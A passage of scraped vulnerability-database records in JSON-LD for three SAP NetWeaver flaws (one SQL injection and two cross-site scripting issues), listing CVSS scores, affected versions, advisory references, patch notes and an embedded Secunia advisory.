"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-7239",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-7239",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201509-373",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in the BP_FIND_JOBS_WITH_PROGRAM function module in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. SAP NetWeaver is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. \nAn attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nSAP NetWeaver 7.40 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "BID",
"id": "79344"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7239",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "134801",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004934",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201509-373",
"trust": 0.6
},
{
"db": "BID",
"id": "79344",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "79344"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"id": "VAR-201509-0262",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:14:36.343000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2193389",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "NVD",
"id": "CVE-2015-7239"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://erpscan.com/advisories/erpscan-15-021-sap-netweaver-7-4-bp_find_jobs_with_program-sql-injecti/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/134801/sap-netweaver-j2ee-engine-7.40-sql-injection.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2015/dec/66"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/537109/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-15-021-sap-netweaver-7-4-bp_find_jobs_with_program-sql-injection/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7239"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-15-021-sap-netweaver-7-4-bp_find_jobs_with_program-sql-injection/"
},
{
"trust": 0.3,
"url": "https://help.sap.com/nw_platform"
}
],
"sources": [
{
"db": "BID",
"id": "79344"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "79344"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-09T00:00:00",
"db": "BID",
"id": "79344"
},
{
"date": "2015-09-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"date": "2015-09-18T14:59:05.050000",
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"date": "2015-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-09-09T00:00:00",
"db": "BID",
"id": "79344"
},
{
"date": "2015-09-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-004934"
},
{
"date": "2018-12-10T19:29:12.313000",
"db": "NVD",
"id": "CVE-2015-7239"
},
{
"date": "2015-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver J2EE Engine of BP_FIND_JOBS_WITH_PROGRAM In the module SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-004934"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201509-373"
}
],
"trust": 0.6
}
}
var-201707-0531
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in the ctcprotocol/Protocol servlet in SAP NetWeaver AS JAVA 7.3 allows remote attackers to inject arbitrary web script or HTML via the sessionID parameter, aka SAP Security Note 2406783. Vendors have confirmed this vulnerability SAP Security Note 2406783 It is released as.Information may be obtained and information may be altered. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-0531",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.3"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "as java 7.3"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "BID",
"id": "97566"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11458"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "97566"
}
],
"trust": 0.3
},
"cve": "CVE-2017-11458",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-11458",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-11458",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-11458",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-871",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the ctcprotocol/Protocol servlet in SAP NetWeaver AS JAVA 7.3 allows remote attackers to inject arbitrary web script or HTML via the sessionID parameter, aka SAP Security Note 2406783. Vendors have confirmed this vulnerability SAP Security Note 2406783 It is released as.Information may be obtained and information may be altered. \nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "BID",
"id": "97566"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-11458",
"trust": 2.7
},
{
"db": "BID",
"id": "97566",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006731",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "97566"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"id": "VAR-201707-0531",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:38:55.032000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "April 2017 (2406783)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
},
{
"title": "SAP NetWeaver AS JAVA Repair measures for cross-site scripting security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=148142"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "NVD",
"id": "CVE-2017-11458"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/97566"
},
{
"trust": 1.6,
"url": "https://erpscan.io/advisories/erpscan-17-017-sap-netweaver-java-7-3-java-xss-ctcprotocolprotocol-servlet/"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-17-017-sap-netweaver-java-7-3-java-xss-ctcprotocolprotocol-servlet/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11458"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11458"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2406783"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/04/11/sap-security-patch-day-april-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "97566"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "97566"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:00:00",
"db": "BID",
"id": "97566"
},
{
"date": "2017-09-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"date": "2017-07-25T18:29:01.133000",
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"date": "2017-07-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-25T13:11:00",
"db": "BID",
"id": "97566"
},
{
"date": "2017-09-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006731"
},
{
"date": "2021-04-20T19:35:27.590000",
"db": "NVD",
"id": "CVE-2017-11458"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006731"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-871"
}
],
"trust": 0.6
}
}
var-201004-0451
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NetWeaver is prone to a cross-site scripting vulnerability. ----------------------------------------------------------------------
Secunia integrated with Microsoft WSUS http://secunia.com/blog/71/
TITLE: SAP NetWeaver WebDynpro Runtime Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID: SA38629
VERIFY ADVISORY: http://secunia.com/advisories/38629/
DESCRIPTION: Mariano Nu\xf1ez Di Croce has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks.
Certain unspecified input passed to the WebDynpro Runtime is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability is reported in SAP NetWeaver 2004 prior to SP21 and SAP NetWeaver 2004s prior to SP13.
SOLUTION: Patches are available via SAP Note 1424863. https://service.sap.com/sap/support/notes/1424863
PROVIDED AND/OR DISCOVERED BY: Mariano Nu\xf1ez Di Croce, Onapsis
ORIGINAL ADVISORY: Onapsis: http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html
SAP Note 1424863: https://service.sap.com/sap/support/notes/1424863
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201004-0451",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "4.0"
},
{
"model": "netweaver",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "sp21"
}
],
"sources": [
{
"db": "BID",
"id": "73745"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-1609"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "73745"
}
],
"trust": 0.3
},
"cve": "CVE-2010-1609",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2010-1609",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-1609",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201004-498",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-005438"
},
{
"db": "NVD",
"id": "CVE-2010-1609"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-498"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
